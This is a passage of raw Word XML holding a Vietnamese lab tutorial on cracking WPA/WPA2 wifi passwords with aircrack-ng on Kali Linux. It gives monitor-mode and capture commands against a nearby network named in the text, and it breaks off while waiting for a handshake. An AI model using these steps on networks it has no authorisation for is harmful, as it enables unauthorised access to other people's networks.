          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Wifi là công cụ kết nối không thể thiếu trên điện thoại, laptop, máy tính bảng và một số thiết bị thông minh khác.</w:t>
      </w:r>
      <w:r w:rsidR="00E5361F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Hệ thống này cho phép truy cập Internet tại những khu vực có sóng của hệ thống này, hoàn toàn không cần đến cáp nối. Ngoài các điểm kết nối công cộng (hotspots), WiFi có thể được thiết lập ngay tại nhà riêng. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E05A6F7" w14:textId="01FB3FA6" w:rsidR="000A1434" w:rsidRPr="00F12C2B" w:rsidRDefault="000A1434" w:rsidP="000A1434">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Trong phần bài tập đầu tiên,</w:t>
      </w:r>
      <w:r w:rsidR="00DB405A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">tôi sẽ hướng dẫn cho các bạn cách hack mật khẩu wifi bằng công cụ </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Aircack-ng</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> được cài đăt trong hệ điều hành </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Kali linux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C25E0FE" w14:textId="10AC6CD8" w:rsidR="000A1434" w:rsidRPr="00F12C2B" w:rsidRDefault="000A1434" w:rsidP="000A1434">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Bạn nên lưu ý rằng,</w:t>
      </w:r>
      <w:r w:rsidR="00DB405A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tại hầu hết các quốc gia trên thế giới,</w:t>
      </w:r>
      <w:r w:rsidR="00DB405A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>bạn chỉ được phép bẻ khóa wifi thì nó thuộc quyền sỡ hữu của bạn hoặc đã được người khác cho phép bạn hack.</w:t>
      </w:r>
      <w:r w:rsidR="00DB405A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Nếu hành vi bẻ khóa mạng không đáp ứng hai tiêu chí trên thì nó được xem là bất hợp pháp và có thể cấu thành tội phậm cộng nghệ cao.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42737CCC" w14:textId="7AC7FB7F" w:rsidR="000A1434" w:rsidRPr="00F12C2B" w:rsidRDefault="000A1434" w:rsidP="000A1434">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>2.Khai thác</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B09522" w14:textId="1EC58518"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Trước khi bắt đầu khai thác,</w:t>
      </w:r>
      <w:r w:rsidR="00F12C2B" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>bạn cần phải cài đặt hệ điều hành Kali linux như tôi đã hướng dẫn ở Lab 1.</w:t>
      </w:r>
      <w:r w:rsidR="00DB405A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Sau đó bạn cần phải chuẩn bị một card mạng Wifi hỗ trợ giám sát ở cửa hàng máy tính.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425631B0" w14:textId="3BCB6F00"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Sau khi hoàn tất các bước chuẩn bị,</w:t>
      </w:r>
      <w:r w:rsidR="00F12C2B" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>ta tiến hành khai thác.</w:t>
      </w:r>
      <w:r w:rsidR="00F12C2B" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DB405A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Quá</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> trình hack wifi bao gồm các bước:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBCFBD5" w14:textId="77777777"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 xml:space="preserve">Bước 1: Truy câp vào Terminal và gõ lệnh </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">airmon-ng </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">để tìm tên công cụ giám sát wifi ở phần Interface đó là </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>wlan0.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101624DA" w14:textId="1F414DF7"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1FB84EF7">
          <v:shape id="Hình ảnh 67" o:spid="_x0000_i1061" type="#_x0000_t75" style="width:285pt;height:211.5pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId46" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C906615" w14:textId="7F5B4069"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2:</w:t>
      </w:r>
      <w:r w:rsidR="00F12C2B" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Tiến hành nhập lệnh </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>airmon-ng start wlan0</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> để bắt đầu giám sát mạng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA917E3" w14:textId="111EEAE9"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42DDCB6B">
          <v:shape id="Hình ảnh 89" o:spid="_x0000_i1062" type="#_x0000_t75" style="width:415.5pt;height:186.75pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId47" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1406144B" w14:textId="1278A778" w:rsidR="000A1434" w:rsidRPr="00F12C2B" w:rsidRDefault="000A1434" w:rsidP="000A1434">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Bước 3: Bật chế độ giao diện giám sát mạng.</w:t>
      </w:r>
      <w:r w:rsidR="00F12C2B" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Ta sử dụng lệnh:</w:t>
      </w:r>
      <w:r w:rsidR="00E719D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>iwconfig.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484536E5" w14:textId="68BC8134" w:rsidR="000A1434" w:rsidRPr="00F12C2B" w:rsidRDefault="00283404" w:rsidP="000A1434">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="4A6D7154">
          <v:shape id="Hình ảnh 93" o:spid="_x0000_i1063" type="#_x0000_t75" style="width:420pt;height:312.75pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId48" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2257CB21" w14:textId="77777777"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 xml:space="preserve">Tên giao diện giám sát mạng trong hầu hết tất cả các trường hợp sẽ là </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">wlan0mon </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">hoặc là </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>mon0</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1885F6" w14:textId="54B6BB52"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4: Sử dụng câu lệnh airmon-ng check kill để loại trừ các tiến trình trả về bị lỗi.</w:t>
      </w:r>
      <w:r w:rsidR="00F12C2B" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Bởi vì trong một số trường hợp nhất định card mạng wifi sẽ bị xung đột với dịch vụ trên máy tính.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D7E118" w14:textId="6BA3CC6E"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4C517289">
          <v:shape id="Hình ảnh 101" o:spid="_x0000_i1064" type="#_x0000_t75" style="width:468pt;height:106.5pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId49" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E32E70" w14:textId="013D19C0"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 xml:space="preserve">Bước 5: Sử dụng câu lệnh </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>airodump-ng wlan0mon</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> để máy tính kiểm tra các bộ đinh tuyến (router) trọng phạm vi xung quanh bạn mà nó có thể bắt được.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A793490" w14:textId="6EC1C1F6"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7D02C80E">
          <v:shape id="Hình ảnh 154" o:spid="_x0000_i1065" type="#_x0000_t75" style="width:468pt;height:312.75pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId50" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E242CB" w14:textId="20118FE0" w:rsidR="000A1434" w:rsidRPr="00F12C2B" w:rsidRDefault="000A1434" w:rsidP="000A1434">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Tôi bắt được 2 bộ định tuyến xung quanh ngay tại thời điểm này.</w:t>
      </w:r>
      <w:r w:rsidR="00F12C2B" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Một là wifi có tên là </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>HONG_PHUC</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> với </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">BSSID: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>D4:9A:A</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>0:11:37:21</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> và wifi </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>VAN_NAM</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> với BSSID: </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>A4:F4:C2:BD:D0:F8.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21292E5B" w14:textId="39BD74E5"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6: Bây giờ chọn bộ định tuyến mà bạn muốn bẻ khóa.</w:t>
      </w:r>
      <w:r w:rsidR="00F12C2B" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Bạn cần chắc chắn rằng các bộ định tuyến này sử dụng giao thức bảo mật WPA hoặc WPA2 như hình trên.</w:t>
      </w:r>
      <w:r w:rsidR="00E719D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Nếu có 2 thẻ </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>này,ta</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> có thể tiếp túc hack,nếu không thì dừng lại,ta không thể hack mạng đó.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E40CE9" w14:textId="0A95157A"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65CD286F">
          <v:shape id="Hình ảnh 158" o:spid="_x0000_i1066" type="#_x0000_t75" style="width:468pt;height:51pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId51" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED014CC" w14:textId="01AA44B7"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7:</w:t>
      </w:r>
      <w:r w:rsidR="00F12C2B" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Ghi lại các thông tin của router mà bạn muốn tấn công.</w:t>
      </w:r>
      <w:r w:rsidR="00F12C2B" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Ở đây tôi chọn wifi Hong_Phuc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBA9AE5" w14:textId="77777777"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Tôi sẽ ghi lại thông tin địa chỉ MAC và số kênh CH của wifi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D5134B" w14:textId="69B87361"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8: Sử dụng cậu lệnh:</w:t>
      </w:r>
      <w:r w:rsidR="00F12C2B" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">airodump-ng -c 1 –bssid </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>D4:9A:A</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>0:11:37:21 -w /root/Desktop  wlan0mon</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>. Trong đó: -c là kênh của wifi ,--bssid là địa chỉ MAC của wifi,-w /root/Desktop là thư mục lưu trữ kết quả,wlan0mon chính là tên của giao diện giám sát mạng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D51DE65" w14:textId="4CEB2097" w:rsidR="000A1434" w:rsidRPr="00F12C2B" w:rsidRDefault="00283404" w:rsidP="000A1434">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="13F5848F">
          <v:shape id="Hình ảnh 160" o:spid="_x0000_i1067" type="#_x0000_t75" style="width:468pt;height:307.5pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId52" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CD7A5E" w14:textId="343A47EA"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Bước 9:</w:t>
      </w:r>
      <w:r w:rsidR="00F12C2B" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Chờ:</w:t>
      </w:r>
      <w:r w:rsidR="00F12C2B" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>handshake” hoặc:</w:t>
      </w:r>
      <w:r w:rsidR="00F12C2B" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
